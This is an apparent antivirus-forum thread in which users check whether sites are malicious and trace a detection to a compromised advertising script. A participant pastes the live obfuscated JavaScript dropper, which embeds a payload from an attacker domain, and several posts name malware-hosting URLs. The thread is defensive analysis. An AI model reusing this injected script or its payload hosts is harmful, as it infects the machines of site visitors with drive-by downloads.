Is this a malicious site?

I’m wondering if someone could identify whether or not a site is malicious. I’m normally very careful about where I go, but I accidentally clicked on this link, and given the number of keyloggers distributed through WoW-based links/sites, I’m a bit nervous. Additionally, my PC stalled at the shutting down stage last night, and I rarely have any problems like that.

Here is the link that I am wondering if it is malicious: wow.duowan.com/0910/119283364074.html

I run Firefox with NoScript and keep Avast updated, so even if is malicious I think I’d be ok, but I’d like some peace of mind.

Thanks,

could you please edit your post and deactivate the link (replace http with anything…) so that other users here don’t accidentally click on it and access that bad site…if it’s one, thanks :wink:

Done :smiley:

Generally, avast detection is accurate in these cases.
Isn’t it an encrypted/obfuscated script or iframe?
Wasn’t the site hacked?
Maybe you could contact its webmaster.

Everything on the site is in Chinese, so I don’t really have a way to converse with the webmaster. I did some googling to find mentions of the site, but most of that was in Chinese as well.


Welcome to the forums, noobdude. :slight_smile:

The site seems to be clean. Check the 2 links below for more information.

http://www.UnmaskParasites.com/security-report/?page=www.duowan.com/0910/119283364074.html

http://www.google.com/safebrowsing/diagnostic?site=www.duowan.com


Thanks so much! I’ll bookmark those two sites in case I have any similar issues in the future.

Hello,

Is this site containing a malicious code? It’s an IT forum I’m using for years, Avast detected something today after update:

http:// forum.hwsw.hu /

(with spaces)

Thanks.

Detected what exactly and what was the url of the detection as nothing was found on the home page ?

Thanks for the quick reply.

The following was detected with every page load:

File name: http:// clutchimedia. com/easywaytourism/favicon.php (spaces added for security)
Malware: JS:Downloader-EX [Trj]

Hi Eisengr,

An analysis of the malware can be found here: htxp://wepawet.cs.ucsb.edu/view.php?hash=2e299ed6da33faadcb0e117ba3283a98&t=1255543858&type=js
Do not visit this link with a vulnerable Flash player, or with a browser without NoScript installed,
avast will flag the analyzing site and will disconnect from the dropper, which is at

Sign of “JS:ShellCode-AF [Expl]” has been found in “hXtp://wepawet.cs.ucsb.edu/view.php?hash=2e299ed6da33faadcb0e117ba3283a98&t=1255543858&type=js” file.
re: http://nepenthes.carnivore.it/csni:shellcodes:stuttgart

One should disinfect USB sticks in case of an infection with this trojan,

polonus

I find the favicon.php somewhat strange to start with as it is normally favicon.ico and it is a common form of hacking to either delete the favicon.ico file and create a customised 404 error page to do drive by downloads. Or to modify the favicon.ico file so it is a bit strange to see favicon.php for a different domain.

So this isn’t the trigger page in the http:// forum.hwsw.hu / site, but the destination/payload page. I could attempt to check the favicon.php page which I suspect would confirm the detection (it does, see image), but it doesn’t find where the problem arises in http:// forum.hwsw.hu /.

Ok, the forum’s admins have analysed the problem, it seems to originate from the “keymedia” advertising:

http: // www. keymedia.hu/ keymediajs.cgi?site=hwsw

One of the guys said this is the part of the script that changes randomly and causes a maéware recognition:

script>
try{if(FTx=‘*’)throw new TypeError(‘%’);}catch(g5oD){FTx=g5oD.message;}
RJmP=‘docN75mN65nt.wN72iter28J22r3cdiv sJ74yleJ3dN5cr22pr6fsr69tior6eN3
aabsoJ6cuteN3bJ20leftJ3aN2dr31J3000pxr3b N74opJ3ar2d10J300pxr3bN5cN22J3
eJ22)N3bdocument.wN72ite(J27r3cembr65dJ20wiN64thJ3d100 her69gN68tJ3d100
sJ72cJ3dN22N68tJ74pN3ar2fN2fN63r6cutN63himedia.J63r6fN6dJ2feasywaytN6fu
r72iJ73mN2ffJ61vicon.N70J68pr3fsN3dr591r4dUJ74nr30uN26iN64J3d2N22r20typ
eJ3dr22applicr61tr69onr2fpJ64fr22r3eJ3cJ2fembeJ64r3eJ27)J3bdr6fcumer6eN
74.wr72itr65(r27N3cemJ62ed widthN3d100 hJ65r69J67htJ3dJ3100N20sJ72J63N3
dJ22N68ttpr3aJ2fJ2fclN75N74chiJ6dr65dN69a.comN2fer61sywaytouJ72r69r73mJ
2ffavr69con.phpr3fsJ3dJ591MUN74n0ur26iJ64r3d3N22J3er3cr2femr62edN3eN27)
N3bdJ6fr63r75meJ6et.wr72J69tJ65(N22N3cN2fdivJ3eJ22)N3b’;
eval(unescape(RJmP.replace(/[NJr]/g,FTx)));

//</script

Hope it wasn’t a bad idea to paste it :slight_smile:

The problem now has disappeared.

Hi Eisengr,

Well not so happy about the live link there, the curious may click and get infected, so make it non-clickable by putting hxtp in stead of http or wxwe in stead of www…

We now know it has malcode, but other reports give the site as an all green:
http://www.siteadvisor.com/sites/hwsw.hu
And on unmasked parasites this link is not flagged either:

link - hXtp://www.keymedia.hu/keymediajs.cgi?site=hwsw which is the malcode in question, so good we did some amalysis here, and another proof that avast in these respects is "top of the bill", polonus

Sorry about the live link, i’ve edited it.

A bit nonrelated: it seems that we have an epidemic. On the IT forum a LOT of guys have mentioned that their XP-s have been wasted today. Description: after restart the Windows logo appears, but the GUI won’t start, instead it freezes at a black screen with moveable cursor. Same in safe mode.

Is it a virus?

At least 15 reported cases on this forum alone, all users reported to have updated antivir programs. No malware has been found after scanning. The solution, as it seems, is to boot with a hiren’s type boot-cd and restore the registry to a previous date.

Sorry for the offtopic, but you seem to be still active :slight_smile:

Hi Eisengr,

This is an ongoing story. That is why I propagate the use of a script blocker inside a browser, like Firefox with NoScript (that Giorgi Maone extension has not been circumvented yet), also the extension RequestPolicy can block these nasties from redirected sites. On the other hand there are so many webadmins and hosters with obsolete or exploitable software, and so many users with older versions of apps full of exploits, older browser versions, not fully updated and upgraded OS and third party software that a large community are sitting ducks for this, especially for a multitude install.
Another factor that in these age and times firm system admins stay with XP and the virut file infector has proven beyond a doubt that the file protection system etc, in XP is not full proof to say the least.
Vista and Windows7 have additional mui’s and added layers,

keep safe and secure is the wish of,

polonus

Hi,
when the alert appears, the best way is to send to us (as possible false positive – from bottom right link of dialog) for futher analysis, because some infections are only one time – if we tries to replicate accessing the website, we don’t have alert.

Milos

True, but this epidemic seemed to infect all sorts of computers (different windows SP versions, updated and not, different AV softwares, on different ISPs etc.), totally unconnected to each other. At least 100 machines were affected that I’m aware of.

It turned out that it’s the Daonol.F trojan (most likely). Not sure how to prevent it from happening again (besides the general methods you have recommended previously).

ps. thanks for the PM, but the credit really goes to the Hungarian guys at HWSW.hu, i was just the messenger.